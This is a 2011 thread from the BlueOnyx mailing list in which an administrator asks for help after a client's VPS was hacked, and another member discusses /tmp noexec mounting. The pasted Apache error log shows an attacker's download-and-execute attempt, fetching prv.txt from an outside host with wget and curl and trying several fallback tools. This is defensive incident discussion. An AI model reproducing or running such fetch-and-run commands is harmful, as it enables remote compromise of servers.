[BlueOnyx:08833] Re: vps hacked
Steffan
general at ziggo.nl
Fri Oct 14 03:39:59 -05 2011
Hello Tobias
On a vps /tmp is not a different mount point
(standard solarspeed install)
[root at server4 /]# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/simfs 119G 90G 29G 77% /
none 2.4G 16K 2.4G 1% /dev
-----Oorspronkelijk bericht-----
Van: blueonyx-bounces at mail.blueonyx.it
[mailto:blueonyx-bounces at mail.blueonyx.it] Namens Tobias Gablunsky
Verzonden: donderdag 13 oktober 2011 16:44
Aan: BlueOnyx General Mailing List
Onderwerp: [BlueOnyx:08827] Re: vps hacked
Hello Steffan,
whenever I had such issues, the file was downloaded to /tmp.
If you use the standard mounting policy, this directory is mounted noexec
and the script could be downloaded but not executed. So you would have been
lucky - I cross my fingers.
Mit freundlichen Grüßen,
Tobias Gablunsky
Servertechnik
Server Management
____________________________________________
CBXNET combox internet GmbH
Lützowstr. 106 | 10785 Berlin
Tel: +49 (30) 5900 69-41
Fax: +49 (30) 5900 69-99
www.cbxnet.de
Event Connect - Internet für Ihren Event!
Tel: +49 (30) 5900 69-80
www.event-connect.de
Amtsgericht Berlin-Charlottenburg HRB 71171
Geschäftsführer: Lutz Treutler
________________________________
From: blueonyx-bounces at mail.blueonyx.it
[mailto:blueonyx-bounces at mail.blueonyx.it] On Behalf Of Steffan
Sent: Thursday, October 13, 2011 2:07 PM
To: blueonyx at blueonyx.it
Subject: [BlueOnyx:08816] vps hacked
I still have a client with a BlueQuartz server (vps)
This morning the virtual server was hacked
I looked in the logs and found this in /var/log/httpd/error_log
[Wed Oct 12 00:07:13 2011] [error] [client 220.181.125.72] no
acceptable variant: /usr/sausalito/ui/web/error/fileNotFound.html
--00:07:40-- http://rapha.altervista.org/prv.txt
=> `prv.txt'
Resolving rapha.altervista.org... 46.4.65.68
Connecting to rapha.altervista.org|46.4.65.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,039 (27K) [text/plain]
0K .......... .......... ....... 100%
1015.53 KB/s
00:07:40 (1015.53 KB/s) - `prv.txt' saved [28039/28039]
sh: line 1: lwp-downlod: command not found
sh: line 1: fetch: command not found
sh: line 2: rapha.altervista.org/prv.txt: No such file or directory
% Total % Received % Xferd Average Speed Time Time
Time Current
Dload Upload Total Spent
Left Speed
^M 14 28039 14 4097 0 0 98324 0 --:--:-- --:--:--
--:--:-- 98324^M100 28039 100 28039 0 0 403k 0 --:--:--
--:--:-- --:--:-- 899k
sh: line 3: prv.txt: command not found
--00:07:40-- http://rapha.altervista.org/prv.txt
=> `prv.txt'
Resolving rapha.altervista.org... 46.4.65.68
Connecting to rapha.altervista.org|46.4.65.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,039 (27K) [text/plain]
0K .......... .......... ....... 100%
1020.34 KB/s
00:07:40 (1020.34 KB/s) - `prv.txt' saved [28039/28039]
sh: line 1: lwp-downlod: command not found
sh: line 1: fetch: command not found
sh: line 2: rapha.altervista.org/prv.txt: No such file or directory
% Total % Received % Xferd Average Speed Time Time
Time Current
Dload Upload Total Spent
Left Speed
^M 4 28039 4 1201 0 0 42493 0 --:--:-- --:--:--
--:--:-- 42493^M100 28039 100 28039 0 0 507k 0 --:--:--
--:--:-- --:--:-- 1048k
sh: line 3: prv.txt: command not found
I don't see any admin logins
How can I find out what happened
I dont see anything weird in the access log or message log
Thanxs Steffan
_______________________________________________
Blueonyx mailing list
Blueonyx at mail.blueonyx.it
http://mail.blueonyx.it/mailman/listinfo/blueonyx
More information about the Blueonyx
mailing list